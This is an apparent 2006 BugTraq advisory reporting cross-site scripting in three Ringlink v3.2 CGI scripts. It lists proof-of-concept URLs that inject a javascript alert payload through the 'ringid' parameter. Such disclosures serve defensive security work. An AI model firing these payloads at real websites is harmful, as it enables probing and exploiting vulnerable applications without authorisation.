BugTraq
Ringlink v3.2 - XSS Jun 10 2006 06:11AM
luny youfucktard com
Ringlink v3.2

Homepage:

http://www.ringlink.org

Effected files:

next.cgi

stats.cgi

list.cgi

XSS Vulnerability PoC:

http://www.example.com/ringlink/next.cgi?ringid=[IMG%20SRC=javascript:al
ert('XSS')]

http://www.example.com/ringlink/stats.cgi?ringid=[IMG%20SRC=javascript:a
lert('XSS')]

http://www.example.com/ringlink/list.cgi?ringid=[IMG%20SRC=javascript:al
ert('XSS')]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus